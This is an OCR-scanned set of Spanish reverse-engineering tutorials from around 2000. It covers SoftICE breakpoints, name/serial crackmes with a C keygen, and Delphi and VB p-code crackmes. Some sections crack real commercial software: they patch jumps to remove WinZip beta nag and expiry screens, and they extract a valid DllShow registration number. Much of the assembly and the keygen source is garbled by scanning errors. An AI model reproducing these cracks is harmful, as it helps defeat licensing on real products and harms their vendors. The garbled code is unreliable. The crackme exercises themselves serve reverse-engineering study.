:0040CDD3 E864FCEFFEFF call 0040CA3C 
:0040CDD8 84C0 test al, al 
:0040CDDA “7447 je 0040CE23 


Ahora dentro de 00459245: 


:00459245 E8F237FBFF call 0040CA3C 
:0045924A 84C0 test al, al 
:0045924C 0F8492000000 je 004592E4 


Uhmm a mi me parece que invertir todos esos saltos seria mas que 
suficiente para que el programa este registrado. Tonces hacemos los 
cambios y ejecutamos. Je vemos que no muestra nag ni el titulo de beta 
test! Juaz! Lo logramos. 


Ahh pero... no me fije adelantando los dias del reloj de windows a ver 
que pasa. 


This PRE-RELEASE BETA version of WinZip is quite old, 


This version will continue to run, but will display this message when you start it. You are 
strongly encouraged to download the current version from the WinZip home page at 
hitp: ¿fu winzip.com. 


Uhhh que garron!!! Bueno veamos que podemos hacer con esto 


Anotamos la string y la buscamos en el W32Dasm: 


:00401BED E8300C0600 call 00462822 
:00401BF2 83C410 add esp, 00000010 
:00401BF5 85C0 test eax, eax 
:00401BF7 7427 je 00401C20 


* Possible StringData Ref from Data Ob] ->"This PRE-RELEASE BETA version 


-=>"of WinZip is quite old." 


:00401BFB 68981C4D00 push 004D1C98 
:00401C00 BE287D4D00 mov esi, 004D7D28 
:00401C05 56 push esi 


Jejej veamos que tiene de interesante esto en 00401BF7 tenemos un Je, 
vemos que pasa si lo invertimos: 
No nos salta la ventanita de old version 


Bueno creo que eso es todo, si falta algo... mandenme la solucion por 
mail por que no tengo mas ganas de seguir con el crack este :P 
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El Pollo FECHA: 1/12/2000 


INTRODUCCION 


Mi 2” tutorial. Nota: P.A. (Progresa Adecuadamente). Esta vez se trata de un serial que se obtiene del calculo de un name. 


AL ATAKE 


Empezamos analizando el fichero con el GetTyp o similares. 


- [C:XCrackMe 1l.exe] ----- 
DOS executable file - 20480 bytes 


Portable executable (starting at 216 for 20264 bytes) 
Found no known modifier or compiler. 
Calculated entrypoint: 5950 / 0000173Eh (RVA: 0000173Eh) 
Required CPU type: 80386 
Requires Win 95 or NT 4 


Flags: 


Relocation info stripped from file 
File is executable 

Line numbers stripped from file 
Local symbols stripped from file 


32 bit word machine 
Linker version: 6.0 


Objects 
Name 
.Ttext 
.rdata 
.data 
.Isrc 


(object align = 00001000h): 


Virt size RVA Phys size Phys Ofs 

000009B9h 00001000Kh 00001000HK 00001000h 
000007cch 00002000h 00001000HKh 00002000h 
00000158h 00003000h 00001000Hh 00003000h 
00000rO00h 00004000h 00001000Hh 00004000h 


- Files identified: 1 of 1 (100.005) 


- Total time: 


50.0 ms (0.0 ms/file) (50.0 ms lost) 


El programa no reconoce el compilador usado, pero para asegurarse de que no tiene ninguna compresion o algo raro lo podemos abrir con 
el W32Dasm y se nos muestra perfectamente el codigo con referencias a strings y aqui vemos que no esta empaquetado. Como nota 
podemos ver que utiliza la libreria MFC42.DLL. 


Bueno, vamos a entrarle. Tiene 2 huecos para rellenar el name y el serial por lo tanto tendra deberia leer primero uno y luego otro. Le 
ponemos el cebo con los breakpoints mas comunes para la captura de texto en vecntanas que son el bpx getwindowtexta y el bpx 
getdlgitemtexta. Le damos y nos entra en el bpx getwindowtexta, nos a capturado el name que lo podemos ver con 'd esp->8". Seguimos y 
pulsamos ES y nos coge en este caso el serial. A partir de aqui pulsando 2 veces F12 entramos en el codigo del crackme. 


* Reference To: 


MFC42.Ordinal:0C19, Ord:0C19h 


:004011DA E8F1040000 Cal1 004016D0 <- captura de los datos 


A continuacion reliza basicamente 2 cosas: 

1? -> nuestro name lo pasa a mayusculas y le quita los espacios 

2% -> comprueba que la longitud del name y el serial sean la misma y que sea mayor o igual 
que 3. 


:00401227 3BC1 cmp eaxX, ecx 
:00401229 0F852C010000 jne 0040135B 
:0040122F 83F803 cmp eax, 00000003 
:00401232 0F8C23010000 31 0040135B 


Aqui es donde realmente empieza el algoritmo de comprobacion de lo que deberia generar 
nuestro name y el serial que le hemos metido. 


:00401251 8A1401 mov dl, byte ptr [ecxteax] 
:00401254 8A5CO101 mov bl, byte ptr [ecxteax+01] 
:00401258 8B442414 mov eax, dword ptr [esp+14] 
:0040125C OFBED2 movsx edx, dl 

:0040125F OFBEO0O401 moOvsx eax, byte ptr [ecxteax] 


En estos momentos tenemos en EAX el primer elemento del serial y en EDX el primer elemento 
del name. Se ira haciendo referencia a estos junto con ECX que es el contador que recorre 
las cadenas. Tambien se almacena en EBX el siguiente elemento referenciado por EDX. O sea, 
que para empezar tenemos engatillados: 1% caracter del name, 2% caracter del name y 12 
Caracter del serial. 


Guarda en EAX el nombre (contador) + numero (contador) - 2 
:00401263 8D4410FE lea eax, dword ptr [eaxtedx-02] 
:00401267 99 cda 

:00401268 2BC2 sub eax, edx 

:0040126A OFBED3 movsx edx, bl 


La siguiente instruccion SAR lo que hace es desplazar con signo n bits a la derecha, en 
nuestro caso 1 bit. 


:0040126D D1F8 sar eax, 1 
:0040126F 40 inc eax <- le suma 1 


Todas estas operaciones se las hemos hecho al primer caracter del name con el primer numero 
y el resultado ha de ser igual o deberia ser igual al siguiente caracter del name(EDX) menos 
2 para que fuera correcta la operacion. 


:00401270 83EA02 sub edx, 00000002 

:00401273 3BC2 cmp eax, edx 

:00401275 0F94C0 sete al <- si coinciden alamcena un 1 en AL 
:00401278 880431 mov byte ptr [ecx+tesil, al y las comparaciones 
:0040127B 8B442410 mov eax, dword ptr [esp+10] se iran guardando 
:0040127F 41 inc ecx <- incrementa el contador 

:00401280 8B50F8 mov edx, dword ptr [eax-08] 

:00401283 4A dec edx <- decrementa la longitud de la cadena 
:00401284 3BCA cmp ecx, edx 

:00401286 7CC9 31 00401251 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040124F (C) 


El bucle ira procesando todos los caracteracteres del name con su correspondiente numero del 
serial, pero el ultimo tiene reservada una sorpresa. Por ser el ultimo no puede procesarse y 
despues compararse con el siguiente porque no hay siguiente por lo que han decidido 
compararlo con el segundo caracter del name. A diferencia esta vez el siguiente no esta en 
EBX sino en EDI. 


:00401288 O0FBE1401 movsx edx, byte ptr [ecxteax] 
:0040128C OFBE7801 movsx edi, byte ptr [eax+01] 
:00401290 8B442414 mov eax, dword ptr [esp+14] 
:00401294 83C7FE add edi, FEFFFFFFE 

:00401297 OFBEO401 movsx eax, byte ptr [ecxteax] 
:0040129B 8D4410FE lea eax, dword ptr [eaxtedx-02] 
:0040129F 99 cda 

:004012A0 2BC2 sub eax, edx 

:004012A2 D1F8 sar eax, 1 

:004012A4 40 inc eax 

:004012A5 3BC7 cmp eax, edi 

:004012A7 0F94C2 sete dl 

:004012AA 881431 mov byte ptr [ecx+tesi], dl 
:004012AD 8B442410 mov eax, dword ptr [esp+10] 


Solo nos queda comprobar que todas las comparaciones que se han hecho han almacenado un 1, 
es decir, que todo ha ido bien. Por lo que va comprobando todos los valores para que no sean 
0, en momento uno sea 0 bl se pone a 1 y para que te sonria bl ha de ser 0. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :004012CD(C) 


:004012BE 803C3100 cmp byte ptr [ecx+tesil], 00 
:004012C2 7404 je 004012C8 

:004012C4 B201 mov dl, 01 

:004012C6 EBO0O2 jmp 004012CA 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :004012C2 (C) 


:004012C8 B301 mov bl, 01 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :004012C6 (U) 


:004012CA 41 inc ecx 

:004012CB 3BC8 cmp ecx, eax 

:004012CD 7CEF 31 004012BE 

:004012CF 84D2 test dl, dl 

:004012D1 7446 je 00401319 <- no lo has conseguido 
:004012D3 84DB test bl, bl 

:004012D5 7542 jne 00401319 <- no lo has conseguido 


Este tutorial viene incluido con mi primer Keygenerator escrito en C. Echale un vistazo. 


Keygenerator 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre Ingenieria Inversa y 


Programacion. Email "Colabora con tus Proyectos" 


tinclude <stdio.h> 
Hkdefine kTAM 100 


void 

main (void) 

1 
char *cadena, nombre[kTAM],serial[kTAM]; 
int temp, i,J3; 


printf ("Introduce tu nombre (minimo 3 caracter): 


gets (cadena); 
if (strlen(cadena)>=3) ( 
for (i=0,3=0;i<strlen (cadena) ;1++) 
if(!lisspace(cadenal[il))( 
nombre [3]=toupper (cadena [i]); 
nombre [3+1]='X0'; 
++; 
) 
for (i=0;i<(strlen(nombre)-1);1++)( 
temp=nombre [i1+1]-2-1; 
temp=temp<<1; 
temp=temp-nombre[i]+2; 
serial[il=temp; 
) 
temp=nombre [1]-2-1; 
temp=temp<<1; 
temp=temp-nombre[i]+2; 
serial[il=temp; 
serial[i+1]='"X0'; 
printf ("Su serial es: $%siIn",serial); 


mm; 
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INTRODUCCION 


Hit Tutoríal de Crackeo Para Newbies desde Cero 15/08/99 


Por Karpoff, PROYECTO 5 


- Utilización Básica del Soft-Ice. 


- Dll1Show V4.3 


Hola nuevamente !! Un saludo para todos los que seguís esta serie de Manuales Para Newbies desde Cero. 


Con este manual el N*5 Empezamos una nueva fase, Aprenderemos a utilizar el Softlce e intentaremos capturar 
un numero de registro valido para nuestro programa. 


Empezare explicando las funciones del Soft-Ice mas utilizadas y las que utilizaremos en este Caso. 


AL ATAKE 


Primero iniciamos el ordenata y cargamos el Soft-ice (en la Web hay unos tutoriales sobre instalación y configuración 


del Soft.) si todo ha ido bien estamos en Windows y aparentemente todo esta igual que siempre per0...... la realidad 
es otra, hay algo controlando los procesos del sistema, es un Debug el mejor y si no probar a pulsar las teclas [Ctrl 
+ D] madre mía!!! pero que demonios es esto tan oscuro y con tantos números????, Bueno esto nos va ha mostrar todo lo 


que queramos sobre un programa, un proceso de un dll, ocx Etc. Paso a paso las teclas mas utilizadas 


Teclas de Funcion del Soft-TIce 


Fl ---- Help 


F2 ---- ventana en la parte superior de la pantalla que nos muestra los valores que van llevando EBX, EAX, ECX, EDX, 
EDI, ESI ETC. 


F4 ---- Nos muestra como esta todo fuera del soft en ese preciso instante, ósea que si tenemos un editor HEX abierto 
en Windows, veremos una imagen capturada del editor , esto es muy útil ejemplo: estamos intentado petar un programa y 
queremos saber en que preciso instante nos va ha salir la pantalla que nos avisa, de que el programa esta en 
evaluación para poder saber en que parte del código se ejecuta la orden, pues mientras seguimos paso a paso los 
procesos pulsamos F3 y nos muestra lo que se cuece en ese momento fuera del Soft, ya os digo es una imagen capturada 
como una foto, para volver pulsamos otra vez F3. 


F5 ---- Hace que el programa que estamos Traceando se ejecute normalmente, hasta que se encuentre con algún BreakPoint 
que hallamos puesto lo mismo hace si pulsamos [Ctrl + D] desde dentro del Soft, las dos teclas nos sirven para 
sacarnos del Soft a Windows. 


F8 ---- Con esta tecla vamos ejecutando el programa paso a paso, entrando en todo tipo de procesos , Osea que ejecuta 
la instrucción actual y se pararía en la siguiente asta que pulsemos nuevamente F8. 


F10 ---- Lo mismo que F8 pero sin entrar en llamadas ( Call ) se las salta continuando con la ejecución en el Retorno 
( Ret ) de dicha llamada, 


F11 ---- La definición para esta tecla es, ejecuta hasta una dirección de memoria. (¿?? no lo entiendo fe??") yo la 
utilizo igual que F12 y los resultados son los mismos. 


F12 ---- Nos Retorna al punto donde ha terminado una llamada ejemplo: Imaginamos que estamos petando un programa y 
hemos puesto unos BreakPoints ( Puntos de Ruptura ) para capturar un proceso determinado, estamos ejecutando el 
programa y derrepente hay una llamada al BreakPoint que pusimos, lo normal que veríamos en pantalla seria algo así 


Dentro del SoftlIce 


015F:BFF57740 C20C00 RET 000C 


USER32!GETWINDOWTEXTA -- momento en que el breakPoint para el programa 


015F:BFF51743 B1A1 MOV CL,Al 


aquí ha habido una llamada externa típica a la librería de Windows User32.dll1 concretamente a Getwindowtexta, y si os 
fijáis lo resaltado en rojo nos dice que estamos dentro de User32.dll pero a nosotros no nos interesa para nada esta 
dll, entonces para saber quien hizo la llamada a user32.dl1l pulsamos F12 y nos mostraría 


Dentro del SoftlIce 


015F:0041552B FF15B04700 CALL [User32!GetWindowTexta] ----- La llamada 


015F:00415531 5F POP EDI ---- Retornaríamos Aquí 


Lo Dl1Show!. Text+0001452B=="-===============-- 


Pues aquí vemos que la llamada la hizo 0041552B que es una llamada Externa a User32.dl11 concretamente GetWindowTexta , 
y nosotros hemos utilizado esa llamada para poner un BreakPoint (punto de Ruptura ) A un proceso de la librería 
user32.d11, El BreakPoint seria BPX GetWindowTexta que lo escribiríamos tal y como esta, en la línea de comandos de 
Soft-Ice. cualquier llamada que hubiese a la Función GetWindowTexta nos pararía el programa de isofacto para saber de 
donde se hizo esa llamada pulsaríamos F12. ( Espero que lo estéis entendiendo tan bien como yo intento explicarlo J ) 
Para saber las llamadas externas que contienen las D11 solo tenéis que editar la dll que queráis con el Vista Rápida 
de Windows, si lo tenéis instalado sale cuando pincháis con el botón derecho del ratón, sobre un archivo, y 
seleccionáis vista rápida o Quick View o si tenéis instalado el Quick View Plus pues mejor, luego todas las llamadas 
pueden ser utilizadas como BreakPoints dependiendo del proceso que queramos seguir. 


BreakPoints o puntos de ruptura 


Los Breakpoinst son la madre del cordero, Se trata de que el programa pare en el momento en que hay una llamada a una 
función de una librería (dl11) que usa el programa. Existen en Windows unas librerías ( user32.dl1l Kernel32.dll, 
advapi32.dl11, shel132.d11, gdi32.d11l Etc.) Que son necesarias para la ejecución de un programa en entorno Windows, El 
ejcutable del programa hace uso de estas librerías mediante llamadas a las distintas funciones de Cada librería, 
sabiendo que función utiliza para ejecutar un determinado proceso, podremos capturarlo en el preciso instante en que 
comienza la ejecución de dicho proceso, como???? Poniendo un breakPoint, como se pone un BreakPoint??? Desde la línea 
de comandos del Soft-Ice con el comando BPX 


BPX getdlgitemtexta --- BreakPoint a una Función de la librería User32.d11 


BPX getdlgitemtext --- BreakPoint a una Función de la librería User.dll o User32.d11 


Observáis que uno termina en [a] y el otro no. Esta [a] sirve para indicar que estamos ejecutando un programa de 32 
Bytes , a los programas de l6Bytes no debemos de poner la [a], ya que no haría efecto el BreakPoint 


Como puedo saber que BreakPoin tengo que poner??? Como he comentado cada librería tiene su propia lista de funciones 
que las podemos utilizan como puntos de ruptura o BreakPoints, si editáis el ejecutable del programa a crackear con el 
Quick View o Quick View plus, se os mostrara las librerías que utiliza y las funciones de cada librería que utilizara, 
Tenéis que guiaros un poco por instinto, estas funciones tiene nombres que nos pueden sugerir ideas interesantes 
veamos algunos ejemplos. 


Estos son breakPoints muy frecuentes, utilizados para seguir procesos de ventanas de Aviso, textos que aparecen cuando 
intentamos registrar un programa y fallamos etc. 


BPX messagebox 
BPX getdlgitemtexta 
BPX getwindowtexta 


Fijaros en sus nombres Messagebox, WindowTexta J etc. ( vais pillando???) 


También tenemos los que hacen referencia a la fecha, tiempo de caducidad etc. 


BPX getlocaltime 
BPX getfiletime 
BPX getsystemtime 


Creo que con un poco de intuición podemos acertar. Voy a Escribir los mas frecuentes extraídos de un texto que saque 
de la pagina de W.K.T. 


1)General Purposes 


BPX hmemcpy 

BPX showwindow 

BPX updatewindow 

BMSG xxxx wm_gettext / a 
BMSG XxXXxx wm_command 
BMSG XXXxX wm_move 


2) Time Related 


BPINT 21 if ah==2A (DOS) 
BPX getlocaltime 

BPX getfiletime 

BPX getsystemtime 


3)Register Flag Related (e.g. Flag on EAX) 


BPX cs:eip 1f EAX==0 (SICE 3.x) 


4) Memory Flag Related (e.g. Flag on 0030:000045AA) 


BPMB cs:eip rw if 0x30:0x45AA==0 (SICE 3.x) 


5) "Hear The Echo" Technique Related 
BPX 0x30:0x45AA do "d 0x30:0x44BB" (SICE 3.x) 
BPX CS:0x66CC do "? EAX" (SICE 3.x) 


6) CD-ROM and Disk Based Schemes 
BPINT 13 if ah==2 (DOS) 

BPINT 13 if ah==3 (DOS) 

BPINT 13 if ah==4 (DOS) 

BPX GetFileAttributesA 

BPX GetFileSize 

BPX GetDriveType 

BPX GetlastError 

BPX ReadFile 

BPIO -h (Your CD-ROM Port Address) R 


7)Dongle Cracking 


BPINT 21 if ahn==3dh (DOS) 
BPINT 31 if ah==3fh (DOS) 
BPINT 21 if ahn==3dh (DOS) 
B 
B 


PX ReadFileA 
PX CreateFileA 


9)Keyboard Input Related 


BPINT 16 if ah==0 (DOS) 
BPINT 21 if an==0xA (DOS) 


Nota: Texto original en inglés de Aesculapius 


Pero de todos estos los que mas utilizaremos son. 


BPX Messageboxa 


BPX Messagebox 


BPX Messageboxexa 


BPX GetWindowTexta 


BPX GetDlgitemTexta 


BPX GetWindowText 


BPX GetDlgitemText 


BPX GetMessagea 


Imaginaros que que queremos conseguir el numero de serie valido para un programa, Que BreakPoint pondremos??? Supongo 
que los grandes CRACKER sabrán cual es el correcto yo no, lo único que os puedo aconsejar es que pongáis 2 o 3 y ver 
cual salta que podrían ser. 


BPX Messageboxa 


BPX GetWindowTexta 


BPX GetDlgitemTexta 


Y con el que salte continuamos y borramos los demas. los comandos para manipular los BreakPoints son. 


Bpx Breakpoint ----- Poner 


BC Breakpoint ----- Borrar , BC * ----- Borrar todos 


BD Breakpoint ----- Desactivar BD * ----- Desactivar Todos 


BE Breakpoint ----- Activar BE * ----- Activar Todos 


BL ----- Listar todos 


Comandos para ver los procesos que se están ejecutando. utilizaremos. 


D EX ------ nos muestra el contenido de EBX en la ventana de datos 


D EBP-12 --- nos muestra el contenido de EBP-12 en la ventana de datos 


Yo llamo la ventana de datos, a la ventana que muestra los valores en caracteres, junto a los valores en hexadecimal, 
y es que algunas veces tendremos que buscar el n” que buscamos en esa ventana o con una [?] en la línea de comandos. 


? EBX ---- nos muestra el valor de EBX en la línea de comandos 


? EBP-12 - nos muestra el valor de EBP-12 en la línea de comandos 


Para manipular una determinada parte del código. utilizaremos el comando 


A. ===== ensamblar 


En los manuales anteriores hemos manipulado los datos para petar el programa con un editor HEX, en el Soft podemos 
manipular pero los cambios solo quedan manipulados en memeoria, Ósea Temporalmente hasta que ejecutemos nuevamente el 
programa. Esto es muy útil para probar si hemos acertado con el proceso que queremos cambiar. Por ejemplo 


Localizamos un salto 


00425012 74A1 je 00425012 para cambiarlo a un jmp haremos lo siguiente 


A 00425012 [Intro]-pulsar 


0105:00425012 -----=-==-=-=-=- El soft nos mostrara solo la dirección de memoria para que la rellenemos con los datos que 
tengamos pensado aplicar. 


0105:00425012 3jmp 00425012 [Intro] ----- En rojo los datos que hemos metido 
0105:00425014 -=-====-= ==-=-- El soft nos da la siguiente dirección de memoria por si queremos seguir cambiando cosas, si 
no vamos a Cambiar nada mas pulsamos Intro y hemos cambiado un salto ( Pero solo en memoria. ) 


Bueno Creo que he explicado lo suficiente del Soft como para empezar con nuestro programa. Recomiendo a la Peña que 
nunca ha utilizado el Soft, que antes de continuar con el Tutoríal, practiquéis con el soft lo que he explicado, 
probar con una copia de cualquier programa a pulsar F8, F10 , F11, Poner BP Etc. hasta que lo conozcáis un poco 


Parte II 


Buscando un Numero de Registro valido para. 


D11Show V4.3 Que lo tenéis en: 


http: //tucows.teleweb.pt/files4/dll1show.ZIP 


Cuento con que ya habéis salseado con el Soft, esta configurado ( en la Web tenéis un manual sobre configuración e 
Instalación.) y lo tenéis cargado. 


Empezamos: Hoy registraremos nuestro programa con un n/s valido, este numero variara según el nombre de usuario que 
pongamos, Ósea que Cada cual puede poner el suyo. 


Ataque Capturar la rutina que se encarga de verificar el n/s que hemos metido, y seguir su ejecución hasta el momento 
en que compare nuestro n/s con uno valido. 


Abrimos el Soft y cargamos el ejecutable Dllshow.exe. Pulsamos el boton de los engranajes ( load para los amigos ) y 
nos sale una ventanita con un aviso, [Symbol Translations /Load Error] Pulsamos [Si] y entramos directamente al Soft, 
pulsamos F5 o [Ctrl + D] para que se ejecute el programa que tenemos cargado, y salimos nuevamente a Windows, pero 
esta vez se esta iniciando D11Show. Ahora hay que poner los datos del registro, pulsamos Help y Register... y nos sale 
una ventana que nos pide tres datos, rellenamos como queramos. 


User Name: OWL (buho) 


Organization:OWL 


Registrations :123456789 


Y ahora tenemos que poner un BreakPoint para poder seguir paso a paso todo el proceso de crear y comparar el n/s. 
probamos con Getwindowtexta, Pulsamos [Ctrl1+D] y entramos en el Soft, Venga a poner el BP (como se ponía sabéis no?) 


BPX getwindowtexta una vez puesto pulsamos F5 o [Ctrl+D] Para Salir a Windows ahora pulsamos aceptar en la ventana de 
registro y L Cascaras!!! No ha pasado nada nos ha salido la ventana de que el n/s no es correcto. Probaremos con otro 
BP pulsamos nuevamente [Ctrl+D] y borramos el BP que habíamos puesto 


BC * [Intro] ----- Borrar BP 


Ahora probamos con otro 


BPX getdlgitemtexta y pulsamos nuevamente F5 o [Ctrl+D] Para Salir a Windows ahora pulsamos aceptar en la ventana de 
registro y J esta vez si saltamos al soft concretamente en. 


User32! Getdlgitemtexta 


015F:BFF51743 B1A1 MOV CL,Al 


Que es esto? La primera llamada que hace el programa, desde que pusimos el BP a la función Getdlgitemtexta. En este 
momento nos encontramos dentro de User32.d11 


Recordar para saber quien ha hecho la llamada que tecla teníamos que pulsar... Bien F12 y nos lleva a. 


015F:0041552B FF15B0F24100 CALL [USER32! Getdlgitemtexta-] 


015£:00415531 5F POP EDI 


015D:00415532 5E POP ESI ---- Captura User Name 


AQUÍ vemos que ESI NOS HA CAPTURADO el primer campo del formulario, comprobarlo poniendo en la línea de comandos del 
Soft 


D esi ---- veremos en la ventana de caracteres OWL (buho) 


Podríamos ir ejecutando el programa paso a paso , pero se haría eterno ya que si solo a capturado el primer campo, 
supongo que utilizara el mismo sistema para capturar los otros dos, Ósea que pulsamos nuevamente F5 y aparecemos otra 
vez en. 


User32! Getdlgitemtexta 


015F:BFF51743 B1A1 MOV CL,Al 


La segunda llamada que hace el programa, desde que pusimos el BP a la función Getdlgitemtexta. En este momento nos 
encontramos dentro de User32.d11 


Pulsamos F12 para terminar esta llamada y nos lleva a. 


015F:0041552B FF15B0F24100 CALL [USER32! Getdlgitemtexta-] 


015£:00415531 5F POP EDI 


015D:00415532 5E POP ESI ----- Captura Organization 


si antes Capturo el User Name y el valor lo llevaba ESI miremos otra vez que hay en ESI 


D ESI --- OWL ahora ha capturado el segundo campo vamos a por el ultimo que es el que nos interesa, a partir de los 
datos que a recogido generara un n/s y lo comparara con el que hemos puesto, tenemos que encontrar el punto donde lo 
compara, pulsamos F5 y 


User32! Getdlgitemtexta 


015F:BFF51743 B1A1 MOV CL,Al 


La tecera llamada que hace el programa, desde que pusimos el BP a la función Getdlgitemtexta. En este momento nos 
encontramos dentro de User32.d11 


Pulsamos F12 para terminar esta llamada y nos lleva a. 


015F:0041552B FF15B0F24100 CALL [USER32! Getdlgitemtexta-] 


015£:00415531 5F POP EDI 


015D:00415532 5E POP ESI ----- Captura el numero que pusimos 


si repetimos el paso anterior y miramos que hay en ESI, vemos el n/s que hemos metido 


D ESI --=-=-- 123456789 


Ahora que ya tiene el n/s solo tenemos que seguir ejecutando el programa y ver que hace con el n/s, vamos pulsando F10 
( Tambien podriamos ir traceando con F8, Pero nos volveriamos un poco locos, ya que entrariamos en todas la llamadas 
(call) paso a paso. Pero si quereis probar..) 


0041552B FF15B0F24100 CALL [USER32! Getdlgitemtexta-] 


00415531 5F POP EDI 


00415532 5E POP ESI ----- Captura el numero que pusimos 


00415533 B801000000 MOV EAX, 00000001 


00415538 5B POP EBX 


00415539 C3 RET ------ Retorno de una llamada esto nos va ha trasladar al final de una llamada que estaba 
ejecutándose, seguro que nos lleva a la parte donde se genera y compara el n/s. Para los que no tengáis experiencia en 
crackeo os doy un consejo, desensamblar el programa este con el W32dasm y analizar esta parte del código, todo el 
proceso que estamos siguiendo, lo Vais a ver mucho mas claro con un listado muerto. ( pero claro primero terminemos 
esto ) 


A lo que estabamos el Ret nos lleva a: 


0040D342 E8B9810000 CALL 00415500 --- VEIS EL RET ERA EL FINAL DE ESTA LLAMADA 


0040D347 8D4C2440 LEA ECX, [ESP+40] 


0040D34B 51 PUSH ECX 


SEGUIMOS CON F10 


0040D351 56 PUSH ESI 


0040D352 8BD8 MOV EBX,EAX ----- EAX LLEVA NUESTRO N/S MIRARLO 


0040D361 7518 JNZ 0040D37B ----- SALTA A 


? EAX 123456789 


CONTINUAMOS CON F10 


0040D37B 3B3CCE50D CMP EAX, 005FCE3C compara 


0040D380 750CC JNZ 0040D38E ------- SALTA A si no es 0 (osea si) 
0040D38E 57 PUSH EDI ----- GUARDA NUESTRA ORGANITATION 
0040D38F 56 PUSH ESI ----- GUARDA NUESTRO USER NAME 


0040D390 E89BB7B0000 CALL 00414F30 - LLAMA A LA RUTINA QUE GENERA EL N/S 


0040D395 83C408 ADD, 08 


0040D398 3BD8 CMP EBX,EAX ----- COMPARA LOS N/S EL NUESTRO CON EL VALIDO 


SOLO NOS QUEDA SABER CUAL ES EL QUE SE CORRESPONDE CON LOS DATOS QUE HEMOS PUESTO. 


? EBX = 123456789 el nuestro 


? EAX = 3703297526 el que vale 


Acordaros de que si pusisteis el user name con mayusculas a la ora de meter el n/s , a de estar exactamente igual. 


Como siempre espero que lo ayais cojido, yo intento explicar lo mejor que puedo, pero no soy ningun experto por lo 
tanto hay algunas comprovaciones que realiza el codigo que no puedo explicarlas por que no las se, supongo que 
conprobara que el n/s tenga un minimo y un maximo de longitud, que esten todos los campos completos, que sean numeros 
y no letras etc. 


Cualquier Duda, Sugerencia, Critica etc. A 


Email Kf_karpofffhotmail.com URL: http://welcome.to/karpoff 


Un Saludo a TODOS/AS. (Karpoff) 


Este material es solo para uso educativo, por ahora los cracks son ilegales. 


Como crackear el Crackme 1 by Daniel-R]J 


Download http://www.iespana.es/cracksam/CraCks/danielc.zip 
Coder Daniel- RJ 


Hola aca estoy de vuelta con un Nuevo manual, esta ves es para crackear un crackme 
que me pareciomedio raro. Lo baje de la web de SerialCodex y como vi que tenia un 
manual, pero este no me gustaba (nahh ta guenisimo) decidi hacerlo yo. Pero de una 
forma diferente, ya que el noopeo y yo busque el serial. 


Bueno mi forma de crackearlo es la siguiente: 

Primero abrimos el ejecutable con el Languaje 2000, y vemos que es un proggie hecho 
con Delphi, asi que vamos biendo que bpx poner. Luego vemos que no esta 
comprimido, asi que vamos a el W32Dasm, una ves alli, dejamos que termine y 
abrimos el ejecutable. 


Uhmm, que raro es, vamos a File/About, damos ok y luego vamos a Dam! Where ls 
the whole Thing!!!. Ahora si esta el crack, bueno ponemos nuestro nombre (grO0Ovy) y 
un numero (123123123). Le damos a Check It! Y vemos esto: 


Crackmel El 


No no nol :( Try again! 


Bueno anotamos esa frase y ahora vamos al W32Dasm, ponemos para ver las String 
References y buscamos la cadena No no no! 6 Try again!: 
La encontramos aca: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 

|:0042D56F(C) 

* Possible StringData Ref from Code Obj - >"No no no! :( Try again!" 
| 

:0042D57D B810D64200 mov eax, 0042D610 

:0042D582 E871FBFFFF call 0042DOF8 


Uhmmm pero que hay mas arriba? 
:0042D56A E86163FDFF call 004038D0 
:0042D56F 750C j¡ne 0042D57D 


* Possible StringData Ref from Code Obj - >"Congratz cracker! hehehe" 


:0042D571 B8ECD54200 mov eax, 0042D5EC 
:0042D576 ES7DFBFFFF call 0042D0F8 
:0042D57B EBOA jmp 0042D587 


Ok como vemos la call en 0042D56A es la que se encarga de comprobar/comparar el 
serial number. Tonces hacemos esto. Anotamos la dirección (0042D56A) y ahora 
cargamos el sice. 


Una ves cargado el sice vamos a simbol loader y cargamos el ejecutable, le damos 
load y aparecemos en el sice. Apretamos ctrl. + d y salimos del sice. Ahora habilitamos 
los menus del crackme e ingresamos otra ves los datos (gr00vy y 123123123). Ahora 
pasamos al sice con un ctrl. + 

D y ponemos un bpx getwindowtexta ya que es el que mas se usa en las aplicaciones 
de Delphi. Otra ves ctrl. + d para salir del sice y le damos a Check It!. Inmediatamente 
saltamos al sice. Aca apretamos F11 para ira al codigo del Crackme y paramos en el 
codigo del crackme, una ves en el code del crackme tecleamos g 0042D56A pero no 
pasa nada, solo nos vamos del sice, pero ese es el caso, que salgamos y que cuando lo 
volvamos a pulsar al boton de Check It vallamos a la dirección deseada, asi que 
apretamos de buelta Check It y aparecemos en la call que genera el codigo, asi que 
F8 para entrar enla call y vamos sondeando registros, 

Uhmmm que veo un CMP EAX, EDX que tendrán en el interior? Bueno para saber 
hacemos d eax y vemos que tiene nuestro serial, y un d EDX tiene nuestro serial 
valido!!!! Que es lw55f- 


Bueno espero que les halla gustado y que me mande algun saludito de ves en cuando 
al mail, como para agradecer? Saludar? Bueno chasu! 


Cracker: gr0O0Ovy 

E- mail: groovy26000yahoo.com.ar 
WEB: ¡ 

TEAM: zCt! 


Como crackear el crackmel por VOItiO0 


Dificultad: PUNGA 
Donwload Crackme: Este mismo zip 
Herramientas: WKT-VBDEBUGGER (www.zencracking.com.ar/tools.htm) 


HexWorkshop (www.zencracking.com.ar/tools.htm) 


OffsetCalculator (www.zencracking.com.ar/tools.htm) 


Hola aca estamos con un nuevo tutorial, ahora acerca de aplicaciones codeadas en vb y 
compiladas con P-code, algo nuevo que aprendi gracias al capo de Jb_Duc. 


Bueno, lo que tiene de particular el P-code es que las instrucciones no son asm, sino que son 
algo parecido, que después son traducidos a ASM por la librería vb6.dll o algo asi. Por esta razon 
no se desensamblan como debe ser, pero con la ayuda del WKT-VBDEBUGGER podemos 
debuggearlo fácilmente. Tb hay otras pecularidades de p-code pero eso leelo en el tuto de 
Jb_duc ok? 


Procedemos a abrir el wkt-vbdebugger (desde ahora wtk) y veremos algo asi: 


P-Code Loader v4.1 i 3 


File ¿Action ¿About 


Whiskey 
Kon 
Tekile 


vamos a File/Open... y abrimos el ejecutable. 
Lego vamos a actino/execute aparecen algunos mensajitos y le damos ok a todos. Luego 
aparecemos en el programa. Introducimos el serial: 


Crackme creado por VOIHO 3. lol xj 


ABOUT 


Le damos clic a REGISTRAME y vamos a parar al sice, digo al wtk : >) 
